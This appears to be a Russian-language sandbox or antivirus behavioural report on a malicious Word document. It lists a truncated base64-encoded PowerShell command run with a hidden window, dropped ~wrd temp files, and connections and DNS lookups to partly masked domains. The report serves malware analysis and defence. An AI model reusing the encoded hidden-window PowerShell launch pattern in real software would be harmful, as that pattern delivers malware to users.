Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAiACAAJAAoAHMARQB0AC0AaQBUAGUATQAgACcAdgBhAHIASQBhAGIATABFADoAbwBGAFMAJwAgACAAJwAnACkAIAAiACsAWwBzAHQAUgBJAE4ARwBdACgAIAAnADMANgA+ADEAMQA5ACYAMQAxADUAewA5ADkARgAxADEANAAmADEAMAA1AEsAMQAxAD...
- <Текущая директория>\~wrd0000.tmp
- <Текущая директория>\~wrd0001.tmp
- <Текущая директория>\~wrd0000.tmp
- <PATH_SAMPLE>.doc
- 'am###bedin.com':80
- 'al####tetent.com':80
- 'es##ijer.eu':80
- DNS ASK am###bedin.com
- DNS ASK al####tetent.com
- DNS ASK fi###sch.com
- DNS ASK ed####nstrajet.com
- DNS ASK es##ijer.eu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAiACAAJAAoAHMARQB0AC0AaQBUAGUATQAgACcAdgBhAHIASQBhAGIATABFADoAbwBGAFMAJwAgACAAJwAnACkAIAAiACsAWwBzAHQAUgBJAE4ARwBdACgAIAAnADMANgA+ADEAMQA5ACYAMQAxADUAewA5ADkARgAxADEANAAmADEAMAA1AEsAMQAxAD...' (со скрытым окном)